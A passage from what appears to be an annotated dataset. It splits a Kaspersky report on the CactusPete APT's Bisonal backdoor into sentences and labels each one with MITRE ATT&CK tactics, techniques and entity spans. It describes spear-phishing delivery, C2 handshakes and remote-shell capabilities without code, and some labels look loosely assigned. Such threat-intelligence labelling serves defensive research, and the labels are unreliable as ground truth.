"page_number": 1, "sentence_id": 5, "context_before": "What are they looking for?", "sentence_text": "CactusPete activity\nIn the end… IoCs Authors Konstantin Zykov", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s6-668623", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "CactusPete activity\nIn the end… IoCs Authors Konstantin Zykov", "sentence_text": "The backdoor was used to target financial and military organizations in Eastern Europe CactusPete (also known as Karma Panda or Tonto Team) is an APT group that has been publicly known since at least 2013.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Use backdoor to target financial and military organizations in Eastern Europe.", "entities": [ { "text": "backdoor", "start": 4, "end": 12, "label": "MalwareTool" }, { "text": "was used to target financial and military organizations in Eastern Europe", "start": 13, "end": 86, "label": "Action" }, { "text": "financial and military organizations in Eastern Europe", "start": 32, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "CactusPete", "start": 87, "end": 97, "label": "ThreatActor" }, { "text": "Karma Panda", "start": 113, "end": 124, "label": "ThreatActor" }, { "text": "Tonto Team", "start": 128, "end": 138, "label": "ThreatActor" } ] }, { "uid": "mitre-77_mitre_report-p1-s7-4fcea6", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "The backdoor was used to target financial and military organizations in Eastern Europe CactusPete (also known as Karma Panda or Tonto Team) is an APT group that has been publicly known since at least 2013.", "sentence_text": "Some of the group’s activities have been previously described in public by multiple sources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s8-a4fab4", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "Some of the group’s activities have been previously described in public by multiple sources.", "sentence_text": "We have been investigating and privately reporting on this group’s activity for years as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s9-7a544b", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "We have been investigating and privately reporting on this group’s activity for years as well.", "sentence_text": "This is also true of the group’s latest activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s10-0015f9", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "This is also true of the group’s latest activities.", "sentence_text": "Our research started from only one sample, but by using the Kaspersky Threat Attribution Engine (KTAE) we found 300+ almost identical samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s11-2a468d", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Our research started from only one sample, but by using the Kaspersky Threat Attribution Engine (KTAE) we found 300+ almost identical samples.", "sentence_text": "All of them appeared between March 2019 and April 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s12-e6176e", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "All of them appeared between March 2019 and April 2020.", "sentence_text": "This underlines the speed of CactusPete’s development – more than 20 samples per month.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s13-774603", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "This underlines the speed of CactusPete’s development – more than 20 samples per month.", "sentence_text": "The target location forced the group to use a hardcoded Cyrillic codepage during string manipulations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Uses hardcoded Cyrillic codepage for string manipulations", "entities": [ { "text": "hardcoded Cyrillic codepage", "start": 46, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "use ", "start": 40, "end": 44, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s14-bd50c3", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "The target location forced the group to use a hardcoded Cyrillic codepage during string manipulations.", "sentence_text": "This is important, for example, during remote shell functionality, to correctly handle the Cyrillic output from executed commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s15-b24de1", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "This is important, for example, during remote shell functionality, to correctly handle the Cyrillic output from executed commands.", "sentence_text": "The method of malware distribution for the new campaign remains unknown, but previous campaigns indicate that it’s their usual way of distributing malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s16-e0f646", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "The method of malware distribution for the new campaign remains unknown, but previous campaigns indicate that it’s their usual way of distributing malware.", "sentence_text": "The attackers’ preferred way to deliver malware is spear-phishing messages with “magic” attachments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Delivers malware via spear-phishing messages with attachments", "entities": [ { "text": "spear-phishing messages", "start": 51, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "“magic” attachments", "start": 80, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "deliver ", "start": 32, "end": 40, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s17-86a4b7", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "The attackers’ preferred way to deliver malware is spear-phishing messages with “magic” attachments.", "sentence_text": "The attachments never contain zero-day exploits, but they do include recently discovered and patched vulnerabilities, or any other crafty approaches that might help them deliver the payload.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Uses attachments with patched vulnerabilities to deliver payload", "entities": [ { "text": "attachments ", "start": 4, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "recently discovered and patched vulnerabilities", "start": 69, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "deliver ", "start": 170, "end": 178, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s18-45b015", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "The attachments never contain zero-day exploits, but they do include recently discovered and patched vulnerabilities, or any other crafty approaches that might help them deliver the payload.", "sentence_text": "Running these attachments leads to infection.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Running attachments leads to infection", "entities": [ { "text": "Running ", "start": 0, "end": 8, "label": "Action" }, { "text": "infection", "start": 35, "end": 44, "label": "Action" }, { "text": "attachments ", "start": 14, "end": 26, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-77_mitre_report-p1-s19-c85531", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "Running these attachments leads to infection.", "sentence_text": "Once the malware starts it tries to reach a hardcoded C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Reaches out to hardcoded C2 server", "entities": [ { "text": "reach ", "start": 36, "end": 42, "label": "Action" }, { "text": "hardcoded C2", "start": 44, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "malware ", "start": 9, "end": 17, "label": "MalwareTool" } ] }, { "uid": "mitre-77_mitre_report-p1-s20-016987", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Once the malware starts it tries to reach a hardcoded C2.", "sentence_text": "The handshake consists of several steps: initial request, victim network details and a more detailed victim information request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Malware performs a handshake with a C2 server involving initial requests and exchange of victim network and system information.", "entities": [ { "text": "handshake", "start": 4, "end": 13, "label": "Action" }, { "text": "initial request", "start": 41, "end": 56, "label": "Action" }, { "text": "victim network details", "start": 58, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "victim information request", "start": 101, "end": 127, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s21-c0c9f1", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "The handshake consists of several steps: initial request, victim network details and a more detailed victim information request.", "sentence_text": "This is the complete list of victim specific information that is sent to the C2 during the handshake steps:\nHostname, IP and MAC address;\nWindows version;\nTime set on infected host;\nFlags that indicates if the malware was executed on VMware environment;\nProxy usage flag;\nSystem default CodePage Identifier;", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Sends victim host information to C2 during handshake", "entities": [ { "text": "Hostname", "start": 108, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "IP ", "start": 118, "end": 121, "label": "Infrastructure_Indicator" }, { "text": "MAC address", "start": 125, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "C2", "start": 77, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "Proxy usage", "start": 254, "end": 265, "label": "Infrastructure_Indicator" }, { "text": "System default CodePage Identifier", "start": 272, "end": 306, "label": "Infrastructure_Indicator" }, { "text": "sent ", "start": 65, "end": 70, "label": "Action" }, { "text": "VMware environment", "start": 234, "end": 252, "label": "Infrastructure_Indicator" }, { "text": "Windows version", "start": 138, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "Time ", "start": 155, "end": 160, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-77_mitre_report-p1-s22-19f48e", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "This is the complete list of victim specific information that is sent to the C2 during the handshake steps:\nHostname, IP and MAC address;\nWindows version;\nTime set on infected host;\nFlags that indicates if the malware was executed on VMware environment;\nProxy usage flag;\nSystem default CodePage Identifier;", "sentence_text": "After the handshake has been completed, the backdoor waits for a command, periodically pinging the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Waits for commands and periodically pings C2 server", "entities": [ { "text": "backdoor ", "start": 44, "end": 53, "label": "MalwareTool" }, { "text": " C2 server", "start": 98, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "pinging ", "start": 87, "end": 95, "label": "Action" }, { "text": "waits ", "start": 53, "end": 59, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s23-5a0dc1", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "After the handshake has been completed, the backdoor waits for a command, periodically pinging the C2 server.", "sentence_text": "The response body from the C2 ping might hold the command and parameters (optionally).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1001.003", "name": "Protocol or Service Impersonation" } ], "procedure": "Receives commands and parameters in C2 ping response body", "entities": [ { "text": "C2 ", "start": 27, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "ping ", "start": 30, "end": 35, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s24-55f2a2", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "The response body from the C2 ping might hold the command and parameters (optionally).", "sentence_text": "The updated Bisonal backdoor version maintains functionality similar to past backdoors built from the same codebase:\nExecute a remote shell;\nSilently start a program on a victim host;\nRetrieve a list of processes from the victim host;\nTerminate any process;\nUpload/Download/Delete files to/from victim host;\nRetrieve a list of available drives from the victim host;\nRetrieve a filelist of a specified folder from the victim host;\nThis is what it looks like in code.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Executes commands including remote shell, process manipulation, and file operations", "entities": [ { "text": "Bisonal backdoor", "start": 12, "end": 28, "label": "MalwareTool" }, { "text": "victim host", "start": 171, "end": 182, "label": "Infrastructure_Indicator" }, { "text": "victim host", "start": 222, "end": 233, "label": "Infrastructure_Indicator" }, { "text": "victim host", "start": 295, "end": 306, "label": "Infrastructure_Indicator" }, { "text": " victim host", "start": 352, "end": 364, "label": "Infrastructure_Indicator" }, { "text": "victim host", "start": 417, "end": 428, "label": "Infrastructure_Indicator" }, { "text": "Execute ", "start": 117, "end": 125, "label": "Action" }, { "text": "start ", "start": 150, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "Upload/Download/Delete", "start": 258, "end": 280, "label": "Action" }, { "text": "Retrieve ", "start": 308, "end": 317, "label": "Action" }, { "text": "Retrieve ", "start": 366, "end": 375, "label": "Action" }, { "text": "Retrieve ", "start": 184, "end": 193, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s25-18904d", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "The updated Bisonal backdoor version maintains functionality similar to past backdoors built from the same codebase:\nExecute a remote shell;\nSilently start a program on a victim host;\nRetrieve a list of processes from the victim host;\nTerminate any process;\nUpload/Download/Delete files to/from victim host;\nRetrieve a list of available drives from the victim host;\nRetrieve a filelist of a specified folder from the victim host;\nThis is what it looks like in code.", "sentence_text": "Screenshot of the C2 command handling subroutine This set of remote commands helps the attackers study the victim environment for lateral movement and deeper access to the target organization.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Studies victim environment for lateral movement and deeper access", "entities": [ { "text": "victim environment", "start": 107, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "target organization", "start": 172, "end": 191, "label": "Infrastructure_Indicator" }, { "text": "study ", "start": 97, "end": 103, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s26-d44751", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Screenshot of the C2 command handling subroutine This set of remote commands helps the attackers study the victim environment for lateral movement and deeper access to the target organization.", "sentence_text": "The group continues to push various custom Mimikatz variants and keyloggers for credential harvesting purposes, along with privilege escalation malware.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1056", "name": "Input Capture" } ], "procedure": "Pushes custom Mimikatz variants and keyloggers for credential harvesting", "entities": [ { "text": " Mimikatz variants", "start": 42, "end": 60, "label": "MalwareTool" }, { "text": "keyloggers", "start": 65, "end": 75, "label": "MalwareTool" }, { "text": "privilege escalation malware", "start": 123, "end": 151, "label": "MalwareTool" }, { "text": "push ", "start": 23, "end": 28, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s27-6f59f4", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "The group continues to push various custom Mimikatz variants and keyloggers for credential harvesting purposes, along with privilege escalation malware.", "sentence_text": "What are they looking for?\nSince the malware contains mostly information gathering functionality, most likely they hack into organizations to gain access to the victims’ sensitive data.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Hack into organizations to gain access to victims’ sensitive data", "entities": [ { "text": "hack ", "start": 115, "end": 120, "label": "Action" }, { "text": " gain access ", "start": 141, "end": 154, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s28-ad1fb9", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "What are they looking for?\nSince the malware contains mostly information gathering functionality, most likely they hack into organizations to gain access to the victims’ sensitive data.", "sentence_text": "We would suggest the following countermeasures to prevent such threats:\nNetwork monitoring, including unusual behavior detection;\nUp-to-date software to prevent exploitation of vulnerabilities;\nUp-to-date antivirus solutions;\nTraining employees to recognize email-based (social engineering) attacks;\nCactusPete activity\nCactusPete is a Chinese-speaking cyber-espionage APT group that uses medium-level technical capabilities, and the people behind it have upped their game.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s29-18a6b9", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "We would suggest the following countermeasures to prevent such threats:\nNetwork monitoring, including unusual behavior detection;\nUp-to-date software to prevent exploitation of vulnerabilities;\nUp-to-date antivirus solutions;\nTraining employees to recognize email-based (social engineering) attacks;\nCactusPete activity\nCactusPete is a Chinese-speaking cyber-espionage APT group that uses medium-level technical capabilities, and the people behind it have upped their game.", "sentence_text": "They appear to have received support and have access to more complex code like ShadowPad , which CactusPete deployed in 2020.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deployed ShadowPad malware", "entities": [ { "text": "CactusPete ", "start": 97, "end": 108, "label": "ThreatActor" }, { "text": "ShadowPad ", "start": 79, "end": 89, "label": "MalwareTool" }, { "text": "deployed ", "start": 108, "end": 117, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s30-75e721", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "They appear to have received support and have access to more complex code like ShadowPad , which CactusPete deployed in 2020.", "sentence_text": "The group’s activity has been recorded since at least 2013, although Korean public resources mark an even earlier date – 2009.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s31-01be8f", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The group’s activity has been recorded since at least 2013, although Korean public resources mark an even earlier date – 2009.", "sentence_text": "Last year’s campaigns show that the group has shifted towards other Asian and Eastern European organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s32-76bd40", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Last year’s campaigns show that the group has shifted towards other Asian and Eastern European organizations.", "sentence_text": "Here’s an overview of CactusPete activity in recent years, based on Kaspersky research results:\nMay 2018: a new wave of targeted attacks abusing CVE-2018-8174 (this exploit has been associated with the DarkHotel APT group, as described on Securelist ), with diplomatic, defense, manufacturing, military and government targets in Asia and Eastern Europe;\nDecember 2018 and early 2019:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Conducted targeted attacks abusing CVE-2018-8174 against multiple sectors", "entities": [ { "text": "CactusPete ", "start": 22, "end": 33, "label": "ThreatActor" }, { "text": "DarkHotel APT group", "start": 202, "end": 221, "label": "ThreatActor" }, { "text": " CVE-2018-8174", "start": 144, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "diplomatic", "start": 258, "end": 268, "label": "Infrastructure_Indicator" }, { "text": "defense", "start": 270, "end": 277, "label": "Infrastructure_Indicator" }, { "text": "manufacturing", "start": 279, "end": 292, "label": "Infrastructure_Indicator" }, { "text": "military and government targets in Asia and Eastern Europe", "start": 294, "end": 352, "label": "Infrastructure_Indicator" }, { "text": "abusing ", "start": 137, "end": 145, "label": "Action" }, { "text": "targeted attacks", "start": 120, "end": 136, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s33-037096", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "Here’s an overview of CactusPete activity in recent years, based on Kaspersky research results:\nMay 2018: a new wave of targeted attacks abusing CVE-2018-8174 (this exploit has been associated with the DarkHotel APT group, as described on Securelist ), with diplomatic, defense, manufacturing, military and government targets in Asia and Eastern Europe;\nDecember 2018 and early 2019:", "sentence_text": "Yet, interestingly, the CactusPete APT group has had success without advanced techniques, using plain code without complicated obfuscation and spear-phishing messages with “magic” attachments as the preferred method of distribution.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Uses spear-phishing messages with attachments for malware distribution", "entities": [ { "text": "CactusPete APT group", "start": 24, "end": 44, "label": "ThreatActor" }, { "text": "spear-phishing messages", "start": 143, "end": 166, "label": "Infrastructure_Indicator" }, { "text": " “magic” attachments", "start": 171, "end": 191, "label": "Infrastructure_Indicator" }, { "text": "distribution", "start": 219, "end": 231, "label": "Action" }, { "text": "using ", "start": 90, "end": 96, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s34-ff163b", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "Yet, interestingly, the CactusPete APT group has had success without advanced techniques, using plain code without complicated obfuscation and spear-phishing messages with “magic” attachments as the preferred method of distribution.", "sentence_text": "Of course, the group does continuously modify the payload code, studies the suggested victim in order to craft a trustworthy phishing email, sends it to an existing email address in the targeted company and makes use of new vulnerabilities and other methods to inconspicuously deliver the payload once an attachment has been opened.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" }, { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Modifies payload, studies victims to craft phishing emails, and exploits vulnerabilities for payload delivery", "entities": [ { "text": "targeted company", "start": 186, "end": 202, "label": "Infrastructure_Indicator" }, { "text": "existing email address", "start": 156, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "deliver ", "start": 277, "end": 285, "label": "Action" }, { "text": "modify ", "start": 39, "end": 46, "label": "Action" }, { "text": "studies ", "start": 64, "end": 72, "label": "Action" }, { "text": "craft ", "start": 105, "end": 111, "label": "Action" }, { "text": "makes use of ", "start": 207, "end": 220, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s35-bfdb71", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "Of course, the group does continuously modify the payload code, studies the suggested victim in order to craft a trustworthy phishing email, sends it to an existing email address in the targeted company and makes use of new vulnerabilities and other methods to inconspicuously deliver the payload once an attachment has been opened.", "sentence_text": "The infection occurs, not because of advanced technologies used during the attack, but because of those who view the phishing emails and open the attachments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Relies on users viewing phishing emails and opening attachments for infection", "entities": [ { "text": "phishing emails", "start": 117, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "attachments", "start": 146, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "view ", "start": 108, "end": 113, "label": "Action" }, { "text": "open ", "start": 137, "end": 142, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s36-021667", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "The infection occurs, not because of advanced technologies used during the attack, but because of those who view the phishing emails and open the attachments.", "sentence_text": "Companies need to conduct spear-phishing awareness training for employees in order to improve their computer security knowledge.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s37-aa55cd", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "Companies need to conduct spear-phishing awareness training for employees in order to improve their computer security knowledge.", "sentence_text": "IoCs\nPDB path:\nE:\\vs2010\\new big!\\MyServe\\Debug\\MyServe.pdb\nMD5:\nA3F6818CE791A836F54708F5FB9935F3\n3E431E5CF4DA9CAE83C467BC1AE818A0\n11B8016045A861BE0518C9C398A79573\nRelated material:\nJanuary 29, 2020 March 5, 2020 July 31, 2018 (Korean language)\nMalware Technologies\nTargeted attacks\nMalware Descriptions\nSpear phishing\nBackdoor\nData theft\nCactusPete\nAuthors\nKonstantin Zykov\nCactusPete APT group’s updated Bisonal backdoor", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s38-05415e", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "IoCs\nPDB path:\nE:\\vs2010\\new big!\\MyServe\\Debug\\MyServe.pdb\nMD5:\nA3F6818CE791A836F54708F5FB9935F3\n3E431E5CF4DA9CAE83C467BC1AE818A0\n11B8016045A861BE0518C9C398A79573\nRelated material:\nJanuary 29, 2020 March 5, 2020 July 31, 2018 (Korean language)\nMalware Technologies\nTargeted attacks\nMalware Descriptions\nSpear phishing\nBackdoor\nData theft\nCactusPete\nAuthors\nKonstantin Zykov\nCactusPete APT group’s updated Bisonal backdoor", "sentence_text": "This site uses Akismet to reduce spam.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s39-e88f04", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "This site uses Akismet to reduce spam.", "sentence_text": "Learn how your comment data is processed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s40-11b1bd", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "Learn how your comment data is processed.", "sentence_text": "thanks this really is good blog site.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s41-5f9e1a", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "thanks this really is good blog site.", "sentence_text": "Reply\nTable of Contents", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s42-8b5e12", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Reply\nTable of Contents", "sentence_text": "What are they looking for?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s43-94b7a0", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "What are they looking for?", "sentence_text": "CactusPete activity\nIn the end… IoCs GReAT webinars From the same authors In the same category Latest Posts Latest Webinars Reports Kaspersky GReAT experts dive deep into the BlueNoroff APT’s GhostCall and GhostHire campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s44-c8c257", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "CactusPete activity\nIn the end… IoCs GReAT webinars From the same authors In the same category Latest Posts Latest Webinars Reports Kaspersky GReAT experts dive deep into the BlueNoroff APT’s GhostCall and GhostHire campaigns.", "sentence_text": "Kaspersky researchers discovered previously unidentified commercial Dante spyware developed by Memento Labs (formerly Hacking Team) and linked it to the ForumTroll APT attacks.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Developed and used Dante spyware in ForumTroll APT attacks", "entities": [ { "text": " ForumTroll APT", "start": 152, "end": 167, "label": "ThreatActor" }, { "text": "Dante spyware", "start": 68, "end": 81, "label": "MalwareTool" }, { "text": "Memento Labs ", "start": 95, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "Hacking Team", "start": 118, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "developed ", "start": 82, "end": 92, "label": "Action" }, { "text": "discovered ", "start": 22, "end": 33, "label": "Action" }, { "text": "linked ", "start": 136, "end": 143, "label": "Action" } ] }, { "uid": "mitre-77_mitre_report-p1-s45-71cd40", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "Kaspersky researchers discovered previously unidentified commercial Dante spyware developed by Memento Labs (formerly Hacking Team) and linked it to the ForumTroll APT attacks.", "sentence_text": "Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s46-496783", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity.", "sentence_text": "The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Exfiltrates WhatsApp data using BabShell and MemLoader HidenDesk", "entities": [ { "text": "BabShell ", 